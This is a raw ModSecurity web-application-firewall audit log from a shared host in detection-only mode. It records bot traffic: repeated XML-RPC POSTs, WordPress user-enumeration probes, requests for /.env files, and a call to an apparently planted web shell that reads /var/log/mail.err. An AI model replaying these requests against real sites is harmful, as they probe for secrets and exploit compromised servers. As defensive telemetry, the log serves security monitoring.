[id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE71BkmAj8yxyFrMChhs7wAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750004998538598 1023626 (- - -) Stopwatch2: 1750004998538598 1023626; combined=2213, p1=353, p2=1466, p3=44, p4=63, p5=175, sr=97, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --450cc601-Z-- --fd70d165-A-- [15/Jun/2025:22:00:59.582035 +0530] aE71QUmAj8yxyFrMChhtGQAAAAE 137.184.42.97 60532 127.0.0.1 7081 --fd70d165-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.home9ine.com X-Real-IP: 137.184.42.97 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=efedc6a94aaf22f7b0603050613f25a71750005057 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --fd70d165-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.home9ine.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --fd70d165-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.home9ine.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE71QUmAj8yxyFrMChhtGQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/home9ine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005057866674 1715435 (- - -) Stopwatch2: 1750005057866674 1715435; combined=1875, p1=308, p2=1477, p3=0, p4=0, p5=90, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fd70d165-Z-- --581ecc0b-A-- [15/Jun/2025:22:00:59.684371 +0530] aE71Qt40YvvHR2Fi0mNGFgAAAAk 128.199.112.101 60790 127.0.0.1 7081 --581ecc0b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --581ecc0b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --581ecc0b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE71Qt40YvvHR2Fi0mNGFgAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005058739926 944531 (- - -) Stopwatch2: 1750005058739926 944531; combined=2544, p1=504, p2=1693, p3=43, p4=57, p5=155, sr=142, sw=92, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --581ecc0b-Z-- --e520c82b-A-- [15/Jun/2025:22:01:24.995256 +0530] aE71XJK-05zbifgH_rQFdQAAAAU 162.158.95.248 38862 127.0.0.1 7081 --e520c82b-B-- GET /.env HTTP/1.0 Host: www.getcalley.com X-Real-IP: 162.158.95.248 X-Forwarded-For: 207.180.240.208 Connection: close cf-ipcountry: DE user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 accept: */* accept-encoding: gzip, br cf-ray: 9503751ebd08199b-FRA cf-visitor: {"scheme":"https"} x-forwarded-proto: https cdn-loop: cloudflare; loops=1 cf-connecting-ip: 207.180.240.208 --e520c82b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --e520c82b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env"] [unique_id "aE71XJK-05zbifgH_rQFdQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005084267176 728175 (- - -) Stopwatch2: 1750005084267176 728175; combined=1969, p1=343, p2=1532, p3=0, p4=0, p5=94, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e520c82b-Z-- --a348702e-A-- [15/Jun/2025:22:01:59.893136 +0530] aE71fpK-05zbifgH_rQFjQAAAAU 128.199.112.101 45838 127.0.0.1 7081 --a348702e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a348702e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a348702e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE71fpK-05zbifgH_rQFjQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005118963444 929748 (- - -) Stopwatch2: 1750005118963444 929748; combined=2109, p1=391, p2=1308, p3=46, p4=68, p5=183, sr=113, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a348702e-Z-- --e2a40454-A-- [15/Jun/2025:22:02:59.258010 +0530] aE71ujtuDRGAAnNiXIeeWwAAAAg 128.199.112.101 45386 127.0.0.1 7081 --e2a40454-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --e2a40454-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e2a40454-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE71ujtuDRGAAnNiXIeeWwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005178328291 929776 (- - -) Stopwatch2: 1750005178328291 929776; combined=2275, p1=363, p2=1499, p3=42, p4=101, p5=173, sr=94, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2a40454-Z-- --94b71957-A-- [15/Jun/2025:22:03:59.072295 +0530] aE719vVluSm0zKldlXcyDwAAAAA 128.199.112.101 43696 127.0.0.1 7081 --94b71957-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --94b71957-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --94b71957-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE719vVluSm0zKldlXcyDwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005238105584 966768 (- - -) Stopwatch2: 1750005238105584 966768; combined=2115, p1=366, p2=1361, p3=44, p4=63, p5=176, sr=88, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --94b71957-Z-- --659bc366-A-- [15/Jun/2025:22:04:59.165573 +0530] aE72Mt40YvvHR2Fi0mNGlwAAAAk 128.199.112.101 34712 127.0.0.1 7081 --659bc366-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --659bc366-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --659bc366-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE72Mt40YvvHR2Fi0mNGlwAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005298122622 1043006 (- - -) Stopwatch2: 1750005298122622 1043006; combined=2152, p1=363, p2=1378, p3=47, p4=67, p5=181, sr=98, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --659bc366-Z-- --f1682321-A-- [15/Jun/2025:22:05:07.814173 +0530] aE72O5K-05zbifgH_rQF4QAAAAU 172.71.164.81 35040 127.0.0.1 7080 --f1682321-B-- GET /.env HTTP/1.0 Host: www.superrefrigerations.com X-Real-IP: 172.71.164.81 X-Forwarded-For: 207.180.240.208 X-Accel-Internal: /internal-nginx-static-location Connection: close cf-ray: 95037a94a998d2a8-FRA Accept: */* accept-encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 X-Forwarded-Proto: http cdn-loop: cloudflare; loops=1 CF-Connecting-IP: 207.180.240.208 CF-Visitor: {"scheme":"http"} CF-IPCountry: DE --f1682321-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 14:06:59 GMT ETag: "328-623a72f4250b7" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f1682321-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.superrefrigerations.com"] [uri "/.env"] [unique_id "aE72O5K-05zbifgH_rQF4QAAAAU"] Stopwatch: 1750005307810875 3380 (- - -) Stopwatch2: 1750005307810875 3380; combined=2042, p1=394, p2=1585, p3=0, p4=0, p5=63, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f1682321-Z-- --cb750d06-A-- [15/Jun/2025:22:05:59.398965 +0530] aE72bhLQPChAjmM6-0i3PQAAAAQ 128.199.112.101 35982 127.0.0.1 7081 --cb750d06-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --cb750d06-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cb750d06-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE72bhLQPChAjmM6-0i3PQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005358486976 912064 (- - -) Stopwatch2: 1750005358486976 912064; combined=2139, p1=357, p2=1336, p3=53, p4=71, p5=204, sr=102, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cb750d06-Z-- --278d290c-A-- [15/Jun/2025:22:06:59.464928 +0530] aE72qjtuDRGAAnNiXIee3AAAAAg 128.199.112.101 45820 127.0.0.1 7081 --278d290c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --278d290c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --278d290c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE72qjtuDRGAAnNiXIee3AAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005418507882 957102 (- - -) Stopwatch2: 1750005418507882 957102; combined=2304, p1=472, p2=1444, p3=43, p4=76, p5=167, sr=124, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --278d290c-Z-- --04692163-A-- [15/Jun/2025:22:07:59.087941 +0530] aE725hLQPChAjmM6-0i3igAAAAQ 128.199.112.101 42224 127.0.0.1 7081 --04692163-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --04692163-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --04692163-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE725hLQPChAjmM6-0i3igAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005478124578 963419 (- - -) Stopwatch2: 1750005478124578 963419; combined=2481, p1=448, p2=1409, p3=45, p4=69, p5=292, sr=131, sw=218, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --04692163-Z-- --f0bec552-A-- [15/Jun/2025:22:08:31.637112 +0530] aE73BzNzfFBMRkII6hmp2QAAAAI 13.200.253.63 35030 127.0.0.1 7081 --f0bec552-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 13.200.253.63 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=e8aa37d35640d7419c36b538511f54ae1750005503 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --f0bec552-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.mindscan.edu.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --f0bec552-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.mindscan.edu.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.mindscan.edu.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.mindscan.edu.in"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE73BzNzfFBMRkII6hmp2QAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750005511036199 600990 (- - -) Stopwatch2: 1750005511036199 600990; combined=2047, p1=397, p2=1558, p3=0, p4=0, p5=91, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f0bec552-Z-- --18f70665-A-- [15/Jun/2025:22:08:43.656303 +0530] aE73E_VluSm0zKldlXcypQAAAAA 52.200.54.136 34912 127.0.0.1 7081 --18f70665-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/mail.err HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.200.54.136 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --18f70665-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2944 Connection: close Content-Type: text/html; charset=UTF-8 --18f70665-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE73E_VluSm0zKldlXcypQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750005523651996 4360 (- - -) Stopwatch2: 1750005523651996 4360; combined=2391, p1=397, p2=1860, p3=39, p4=37, p5=58, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --18f70665-Z-- --72cda91b-A-- [15/Jun/2025:22:08:59.720458 +0530] aE73IpK-05zbifgH_rQGYQAAAAU 128.199.112.101 55338 127.0.0.1 7081 